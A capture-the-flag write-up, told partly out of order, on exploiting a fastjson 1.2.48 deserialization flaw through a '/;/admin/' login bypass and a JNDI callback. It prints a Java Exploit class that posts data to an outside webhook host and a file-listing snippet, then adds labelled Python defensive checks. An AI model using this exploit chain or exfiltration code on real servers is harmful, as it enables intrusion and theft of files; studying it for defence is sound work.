Somehow, my RMI server did receive the request, but the file server (to serve Exploit.class) did not.
I decided to change from RMI to JNDI, and it magically worked: it did access my Exploit.class.
But the exploit code still gave no response; we didn't know what to do and were stuck for a while.
Later on, I changed the Java exploit code to Thread.sleep(5) to see whether the remote server executed our code or not, and the answer was surprisingly yes.
So, I updated my Java exploit to send a request to my server, like this:
```java
import java.io.*;
import java.net.*;
import java.util.*;

public class Exploit {
    // The remote server instantiates the class, so the constructor is the entry point.
    public Exploit() throws Exception {
        String str = "test";
        URL url = new URL("https://webhook.site/bad84752-95a1-45c4-8395-e5577ea1112b");
        Map<String, Object> params = new LinkedHashMap<>();
        params.put("msg", str);

        // Build the form-encoded body: msg=<str>
        StringBuilder postData = new StringBuilder();
        for (Map.Entry<String, Object> param : params.entrySet()) {
            if (postData.length() != 0) postData.append('&');
            postData.append(URLEncoder.encode(param.getKey(), "UTF-8"));
            postData.append('=');
            postData.append(URLEncoder.encode(String.valueOf(param.getValue()), "UTF-8"));
        }
        byte[] postDataBytes = postData.toString().getBytes("UTF-8");

        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        conn.setRequestProperty("Content-Length", String.valueOf(postDataBytes.length));
        conn.setDoOutput(true);
        conn.getOutputStream().write(postDataBytes);
        // Opening the input stream is what actually sends the request and waits for the reply.
        Reader in = new BufferedReader(new InputStreamReader(conn.getInputStream(), "UTF-8"));
    }

    public static void main(String[] args) throws Exception {
    }
}
```
After receiving the request, I tried to list files and send them back to my server, but got no response. So I added a try/catch to see what was going on:
```java
String str = "";
try {
    File f = new File("/var");
    // listFiles() returns null when the directory cannot be listed; paths.toString()
    // then throws, and the catch below turns the exception into the message sent back.
    File[] paths = f.listFiles();
    str = paths.toString();
    for (int i = 0; i < paths.length; i++) {
        str += paths[i].toString() + ",";
    }
} catch (Exception e) {
    str = e.toString() + "," + e.getMessage();
}
```
It was java.lang.reflect.InvocationTargetException, and I still don't know why the server threw this exception. Maybe the server blocks certain functions? Or is it a problem with the JDK version?
Anyway, I was stuck for a while again, and then I decided to try reading a file instead of listing a directory. To my surprise again, it worked.
Here comes the end of the story: I read /flag and then, luckily, I got the flag. I am a lucky guy.
We found a login bypass via /;/admin/. After the bypass you can see the admin portal, and there is a mailbox page.
You can download lib.zip to see what libraries they used, and this file for sure is the key: fastjson-1.2.48.jar
After a few tries we found that the endpoint POST /admin/mailbox.jsp is vulnerable. We can send JSON data via inputtext={JSON}.
By sending a simple query, you can validate that it's vulnerable, because we received the DNS query:
After finding the injection entry, we tried a few payloads we could find on the internet, but somehow they did not work.
So I followed the instructions here: 红队武器库:fastjson小于1.2.68全漏洞RCE利用exp (Red Team Arsenal: fastjson < 1.2.68 full-vulnerability RCE exploit) to run an RMI server via:
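The two weaknesses this write-up relies on, seen from the defender's side, as an added Python example that is not code from the original post: an access-control check that normalizes the request path before matching (so /;/admin/ is treated as /admin/ rather than slipping past a raw-string filter), and an inspection of the inputtext form parameter sent to /admin/mailbox.jsp for the fastjson autoType marker (@type) and JNDI lookup URLs (rmi://, ldap://). The values attacker.example and PLACEHOLDER.Class used in the checks are constructed placeholders, not anything from the challenge.

```python
import json
import re
from urllib.parse import parse_qs, unquote
# JNDI URL schemes that a fastjson autoType gadget can be pointed at (rmi or ldap).
JNDI_RE = re.compile(r"\b(?:rmi|ldaps?)://[^\s\"'}]+", re.IGNORECASE)

def normalize_path(raw_path):
    """Drop ';param' from each segment, percent-decode, resolve '.' and '..'."""
    out = []
    for seg in raw_path.split("/"):
        seg = unquote(seg.split(";", 1)[0])  # '/;/admin/' -> '', '', 'admin', ''
        if seg in ("", "."):
            continue
        if seg == "..":
            if out: out.pop()
            continue
        out.append(seg)
    path = "/" + "/".join(out)
    if raw_path.endswith("/") and path != "/":
        path += "/"
    return path

def is_admin_request(raw_path):
    # Decide on the normalized path, never the raw one: raw '/;/admin/' != '/admin/'.
    path = normalize_path(raw_path)
    return path == "/admin" or path.startswith("/admin/")

def _walk(node, findings):
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type":  # fastjson autoType class reference
                findings.append("autoType: " + str(value))
            _walk(value, findings)
    elif isinstance(node, list):
        for value in node:
            _walk(value, findings)
    elif isinstance(node, str):
        findings.extend("jndi: " + u for u in JNDI_RE.findall(node))

def inspect_inputtext(body):
    """Findings for a form body carrying inputtext={JSON}; [] when clean."""
    findings = []
    for raw in parse_qs(body, keep_blank_values=True).get("inputtext", []):
        try:
            _walk(json.loads(raw), findings)
        except ValueError:  # fastjson accepts non-strict JSON; scan the raw text
            if "@type" in raw:
                findings.append("autoType: non-JSON body")
            findings.extend("jndi: " + u for u in JNDI_RE.findall(raw))
    return findings
```

A web filter or WAF rule that keys on either function would have caught both the bypass path and the DNS-callback probe the post describes, and the same normalization belongs in the login filter itself.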